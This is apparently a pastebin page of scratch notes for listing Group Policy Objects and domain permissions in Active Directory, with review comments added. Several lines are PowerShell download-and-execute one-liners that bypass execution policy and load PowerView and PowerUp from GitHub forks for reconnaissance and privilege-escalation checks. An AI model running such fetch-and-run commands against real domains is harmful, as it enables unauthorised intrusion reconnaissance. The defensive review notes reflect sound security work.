jessemoore

Get-DomainGPO

Apr 23rd, 2022 (edited)
  # Scratch notes for listing Group Policy Objects in an AD domain, three ways:
  # the StandIn binary, the RSAT GroupPolicy/ActiveDirectory tooling, and
  # PowerView/PowerUp loaded through download-and-execute one-liners.
  # These are working notes, not a script meant to be run top to bottom.
  1. #Setup
  2. #
  3. #
  4. https://github.com/FuzzySecurity/StandIn#list-gpos
  # The next line is a console transcript (prompt plus command), not a script statement.
  5. C:\Users\win11user\Downloads\StandIn_v13_Net35_45> .\StandIn_v13_Net35.exe --gpo
  6. #
  7. #
  8.  
  9. # ensure IPv4 and IPv6 is on the joined computer pointing to AD
  10. # Add-Computer -DomainName “Domain Name” -Credential “Domain Username”
  11. #import-module ActiveDirectory
  # List the RSAT optional capabilities, then install the AD DS/LDS and Group Policy tools.
  # NOTE(review): `Stat` looks truncated; the capability objects expose a `State`
  # property, so as written the second column would presumably come back empty - confirm.
  12. Get-WindowsCapability -Name RSAT* -Online | Select-Object -Property DisplayName, Stat
  13. #Get-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability –Online
  # The next line carries an en dash and curly quotes from a word-processor paste.
  14. Add-WindowsCapability –online –Name “Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0”
  15. Add-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
  16. # Get-GPOReport -All -Domain "corp.contoso.com" -Server "HYD-DC1" -ReportType XML -Path "C:\GPOReports\GPOReportsAll.xml"
  17.  
  # Every one-liner below has the same shape: a child powershell.exe started with
  # -nop (no profile) and -exec bypass (execution policy bypassed for that process)
  # downloads a script over HTTPS and hands the text to IEX.
  # Review points:
  #  - The URLs point at a branch head (master), not a commit, and nothing checks a
  #    hash, so whatever is on that branch at fetch time is what runs.
  #  - The same tools are fetched from several different forks (jessefmoore,
  #    BC-SECURITY, ZeroDayLab), and each fork is a separate trust decision.
  #  - For defenders: with Script Block Logging enabled the downloaded body is
  #    recorded (event 4104), and process-creation auditing with command lines
  #    (event 4688) captures the full one-liner, URL included.
  # This one loads PowerUp.ps1 and runs Invoke-AllChecks.
  18. #WORKSWORKSWORKSWORKS
  19. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/jessefmoore/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"
  20.  
  21. ###############################################################################################################
  22. #WORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKS##########
  23. ###############################################################################################################
  # PowerView from the Empire repository: domain lookup for pets.local.
  24. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetDomain -Domain pets.local"
  25.  
  26. #WWWWWWWWWWWWWWWWWh
  # Same source, GPO listing via Get-NetGPO.
  27. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetGPO"
  28.  
  # The marker on the next line (and the one three entries further down) has no
  # leading '#', so a console would try to run it as a command name; it is an
  # annotation only.
  29. GOOOOOOOOOOOOOOOOOOOOOOOOD
  # Identical to entry 24.
  30. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetDomain -Domain pets.local"
  31.  
  32.  
  33. NNEEEEEEEEEEEEEEEEEEEEEEEEEEEEEWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
  # The same two PowerView calls, fetched from a different fork (ZeroDayLab/PowerSploit).
  34. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1'); Get-NetDomain -Domain pets.local"
  35.  
  36. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1'); Get-NetGPO"
  37.  
  38.  
  39.  
  # RSAT equivalents (Get-GPO), left commented out; these need no remote download.
  40. #Get-GPO -All -Domain "corp.contoso.com"
  41. # Get-GPO -Domain pets.local -All
  # Entries 42 and 46 are disabled variants; each has a stray '#' inside the command
  # text (`#Net.WebClient`, `BC-#SECURITY`), so removing only the leading '#'
  # would not restore a working line.
  42. #powershell -nop -exec bypass -c "IEX (New-Object #Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1'); Get-DomainGPO"
  43. #
  # Entry 44 is a bare double-quoted string with no `powershell -c` in front of it;
  # as written PowerShell just echoes the text and executes nothing.
  44. "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO"
  45. #
  46. #"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-#SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO | Get-DomainPolicy"
  47. #
  48. #
  49. Write-Output "Gathering Domain Permissions for $Domain"
  50. $ForestDomainObjectData = Get-ADObject $ADDomainInfo.DistinguishedName -Properties * -Server $DomainDC
  51. $ForestDomainObjectSecurityData = $ForestDomainObjectData.nTSecurityDescriptor.Access
  52. $ForestDomainObjectPermissions = @()
  53. ForEach ($ForestDomainObjectSecurityDataItem in $ForestDomainObjectSecurityData)
  54.  {
  55.     $ObjectTypeName = Get-NameForGUID $ForestDomainObjectSecurityDataItem.ObjectType -ForestDNSName $ForestDNSName
  56.     $InheritedObjectTypeName = Get-NameForGUID $ForestDomainObjectSecurityDataItem.InheritedObjectType -ForestDNSName $ForestDNSName
  57.  
  58.     $ForestDomainObjectSecurityDataItem | Add-Member -MemberType NoteProperty -Name Domain -Value $Domain -Force
  59.     $ForestDomainObjectSecurityDataItem | Add-Member -MemberType NoteProperty -Name ObjectTypeName -Value $ObjectTypeName -Force
  60.     $ForestDomainObjectSecurityDataItem | Add-Member -MemberType NoteProperty -Name InheritedObjectTypeName -Value $InheritedObjectTypeName -Force
  61.  
  62.     [array]$ForestDomainObjectPermissions += $ForestDomainObjectSecurityDataItem
  63.  }
  64. $ForestDomainObjectPermissionFile = $ReportDir + "\TrimarcADChecks-DomainRootPermissionReport-$Domain-$TimeVal.csv"
  65. $ForestDomainObjectPermissions | Sort IdentityReference | Select IdentityReference,ActiveDirectoryRights,InheritedObjectTypeName,ObjectTypeName,`
  66. InheritanceType,ObjectFlags,AccessControlType,IsInherited,InheritanceFlags,PropagationFlags,ObjectType,InheritedObjectType | `
  67. Export-CSV $ForestDomainObjectPermissionFile -NoTypeInformation  
  68.  
  69. Write-Host "Active Directory Domain Permission report saved to the file $ForestDomainObjectPermissionFile" -Fore Cyan
  70. Write-Host ""